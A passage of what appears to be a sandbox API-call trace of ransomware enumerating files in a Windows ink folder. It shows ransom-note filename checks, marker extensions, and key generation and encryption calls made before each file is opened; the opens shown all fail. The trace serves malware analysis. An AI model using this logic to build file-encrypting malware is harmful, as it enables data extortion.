dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.946] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xf7, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="baseAltGr_rtl.xml", cAlternateFileName="")) returned 1 [0231.946] lstrcmpiW (lpString1="baseAltGr_rtl.xml", lpString2="Windows") returned -1 [0231.946] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml") returned 91 [0231.947] StrStrIW (lpFirst="baseAltGr_rtl.xml", lpSrch=".horseleader") returned 0x0 [0231.947] lstrcmpW (lpString1="baseAltGr_rtl.xml", lpString2="#Decrypt#.txt") returned 1 [0231.947] lstrcmpW (lpString1="baseAltGr_rtl.xml", lpString2="_uninstalling_.png") returned 1 [0231.947] lstrlenW (lpString=".testttjffg") returned 11 [0231.947] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml", lpSrch=".testttjffg") returned 0x0 [0231.947] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.947] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\baseAltGr_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\basealtgr_rtl.xml"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.948] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc59, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_altgr.xml", cAlternateFileName="")) returned 1 [0231.948] lstrcmpiW (lpString1="base_altgr.xml", lpString2="Windows") returned -1 [0231.948] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml") returned 88 [0231.948] StrStrIW (lpFirst="base_altgr.xml", lpSrch=".horseleader") returned 0x0 [0231.948] lstrcmpW (lpString1="base_altgr.xml", lpString2="#Decrypt#.txt") returned 1 [0231.948] lstrcmpW (lpString1="base_altgr.xml", lpString2="_uninstalling_.png") returned 1 [0231.948] lstrlenW (lpString=".testttjffg") returned 11 [0231.948] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml", lpSrch=".testttjffg") returned 0x0 [0231.948] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.948] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.948] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_altgr.xml" (normalized: "c:\\program files\\common files\\microsoft 
shared\\ink\\fsdefinitions\\main\\base_altgr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.162] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f669cc7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc5e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_ca.xml", cAlternateFileName="")) returned 1 [0232.162] lstrcmpiW (lpString1="base_ca.xml", lpString2="Windows") returned -1 [0232.162] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml") returned 85 [0232.182] StrStrIW (lpFirst="base_ca.xml", lpSrch=".horseleader") returned 0x0 [0232.237] lstrcmpW (lpString1="base_ca.xml", lpString2="#Decrypt#.txt") returned 1 [0232.237] lstrcmpW (lpString1="base_ca.xml", lpString2="_uninstalling_.png") returned 1 [0232.237] lstrlenW (lpString=".testttjffg") returned 11 [0232.237] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml", lpSrch=".testttjffg") returned 0x0 [0232.237] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.237] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.237] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_ca.xml" (normalized: "c:\\program files\\common 
files\\microsoft shared\\ink\\fsdefinitions\\main\\base_ca.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.238] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cdbf2a, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cdbf2a, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2e2, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_heb.xml", cAlternateFileName="")) returned 1 [0232.238] lstrcmpiW (lpString1="base_heb.xml", lpString2="Windows") returned -1 [0232.238] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml") returned 86 [0232.238] StrStrIW (lpFirst="base_heb.xml", lpSrch=".horseleader") returned 0x0 [0232.238] lstrcmpW (lpString1="base_heb.xml", lpString2="#Decrypt#.txt") returned 1 [0232.238] lstrcmpW (lpString1="base_heb.xml", lpString2="_uninstalling_.png") returned 1 [0232.238] lstrlenW (lpString=".testttjffg") returned 11 [0232.238] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml", lpSrch=".testttjffg") returned 0x0 [0232.238] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.239] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.239] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_heb.xml" (normalized: "c:\\program 
files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_heb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.480] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x324, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_jpn.xml", cAlternateFileName="")) returned 1 [0232.480] lstrcmpiW (lpString1="base_jpn.xml", lpString2="Windows") returned -1 [0232.480] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml") returned 86 [0232.480] StrStrIW (lpFirst="base_jpn.xml", lpSrch=".horseleader") returned 0x0 [0232.480] lstrcmpW (lpString1="base_jpn.xml", lpString2="#Decrypt#.txt") returned 1 [0232.480] lstrcmpW (lpString1="base_jpn.xml", lpString2="_uninstalling_.png") returned 1 [0232.481] lstrlenW (lpString=".testttjffg") returned 11 [0232.481] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml", lpSrch=".testttjffg") returned 0x0 [0232.481] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.485] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_jpn.xml" (normalized: 
"c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_jpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.485] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d02087, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d02087, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f68fe25, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x1e8, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_kor.xml", cAlternateFileName="")) returned 1 [0232.486] lstrcmpiW (lpString1="base_kor.xml", lpString2="Windows") returned -1 [0232.486] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml") returned 86 [0232.486] StrStrIW (lpFirst="base_kor.xml", lpSrch=".horseleader") returned 0x0 [0232.486] lstrcmpW (lpString1="base_kor.xml", lpString2="#Decrypt#.txt") returned 1 [0232.486] lstrcmpW (lpString1="base_kor.xml", lpString2="_uninstalling_.png") returned 1 [0232.486] lstrlenW (lpString=".testttjffg") returned 11 [0232.486] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml", lpSrch=".testttjffg") returned 0x0 [0232.486] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.486] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.486] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_kor.xml" 
(normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.491] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d281e4, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d281e4, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6b5f83, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x269, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base_rtl.xml", cAlternateFileName="")) returned 1 [0232.493] lstrcmpiW (lpString1="base_rtl.xml", lpString2="Windows") returned -1 [0232.493] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml") returned 86 [0232.493] StrStrIW (lpFirst="base_rtl.xml", lpSrch=".horseleader") returned 0x0 [0232.493] lstrcmpW (lpString1="base_rtl.xml", lpString2="#Decrypt#.txt") returned 1 [0232.493] lstrcmpW (lpString1="base_rtl.xml", lpString2="_uninstalling_.png") returned 1 [0232.493] lstrlenW (lpString=".testttjffg") returned 11 [0232.494] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base_rtl.xml", lpSrch=".testttjffg") returned 0x0 [0232.494] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.494] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.504] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\fsdefinitions\\main\\base_rtl.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base_rtl.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0232.504] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d4e341, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d4e341, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f6dc0e1, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x40e8, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ja-jp.xml", cAlternateFileName="")) returned 1 [0232.971] lstrcmpiW (lpString1="ja-jp.xml", lpString2="Windows") returned -1 [0232.971] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml") returned 83 [0232.971] StrStrIW (lpFirst="ja-jp.xml", lpSrch=".horseleader") returned 0x0 [0232.971] lstrcmpW (lpString1="ja-jp.xml", lpString2="#Decrypt#.txt") returned 1 [0232.971] lstrcmpW (lpString1="ja-jp.xml", lpString2="_uninstalling_.png") returned 1 [0232.971] lstrlenW (lpString=".testttjffg") returned 11 [0232.971] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ja-jp.xml", lpSrch=".testttjffg") returned 0x0 [0232.971] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0232.971] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0232.971] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\fsdefinitions\\main\\ja-jp.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.079] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d7449e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d7449e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f70223f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3af9, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ko-kr.xml", cAlternateFileName="")) returned 1 [0233.079] lstrcmpiW (lpString1="ko-kr.xml", lpString2="Windows") returned -1 [0233.079] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 83 [0233.079] StrStrIW (lpFirst="ko-kr.xml", lpSrch=".horseleader") returned 0x0 [0233.079] lstrcmpW (lpString1="ko-kr.xml", lpString2="#Decrypt#.txt") returned 1 [0233.079] lstrcmpW (lpString1="ko-kr.xml", lpString2="_uninstalling_.png") returned 1 [0233.079] lstrlenW (lpString=".testttjffg") returned 11 [0233.080] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpSrch=".testttjffg") returned 0x0 [0233.080] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.080] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.080] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.080] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9a5fb, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1d9a5fb, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f774659, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x264b, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="zh-changjei.xml", cAlternateFileName="")) returned 1 [0233.080] lstrcmpiW (lpString1="zh-changjei.xml", lpString2="Windows") returned 1 [0233.080] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 89 [0233.080] StrStrIW (lpFirst="zh-changjei.xml", lpSrch=".horseleader") returned 0x0 [0233.080] lstrcmpW (lpString1="zh-changjei.xml", lpString2="#Decrypt#.txt") returned 1 [0233.080] lstrcmpW (lpString1="zh-changjei.xml", lpString2="_uninstalling_.png") returned 1 [0233.080] lstrlenW (lpString=".testttjffg") returned 11 [0233.080] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpSrch=".testttjffg") returned 0x0 [0233.080] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.080] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.081] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.103] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e7ee29, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e7ee29, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="zh-dayi.xml", cAlternateFileName="")) returned 1 [0233.103] lstrcmpiW (lpString1="zh-dayi.xml", lpString2="Windows") returned 1 [0233.103] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 85 [0233.103] StrStrIW (lpFirst="zh-dayi.xml", lpSrch=".horseleader") returned 0x0 [0233.103] lstrcmpW (lpString1="zh-dayi.xml", lpString2="#Decrypt#.txt") returned 1 [0233.103] lstrcmpW (lpString1="zh-dayi.xml", lpString2="_uninstalling_.png") returned 1 [0233.103] lstrlenW (lpString=".testttjffg") returned 11 [0233.103] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpSrch=".testttjffg") returned 0x0 [0233.103] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.104] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0233.104] CreateFileW 
(lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.104] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 1 [0233.104] lstrcmpiW (lpString1="zh-phonetic.xml", lpString2="Windows") returned 1 [0233.104] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml") returned 89 [0233.104] StrStrIW (lpFirst="zh-phonetic.xml", lpSrch=".horseleader") returned 0x0 [0233.104] lstrcmpW (lpString1="zh-phonetic.xml", lpString2="#Decrypt#.txt") returned 1 [0233.104] lstrcmpW (lpString1="zh-phonetic.xml", lpString2="_uninstalling_.png") returned 1 [0233.104] lstrlenW (lpString=".testttjffg") returned 11 [0233.104] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml", lpSrch=".testttjffg") returned 0x0 [0233.104] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0233.105] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) 
returned 1 [0233.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-phonetic.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.156] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e32b6f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1e32b6f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f79a7b7, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ac3, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="zh-phonetic.xml", cAlternateFileName="")) returned 0 [0233.156] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0233.157] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 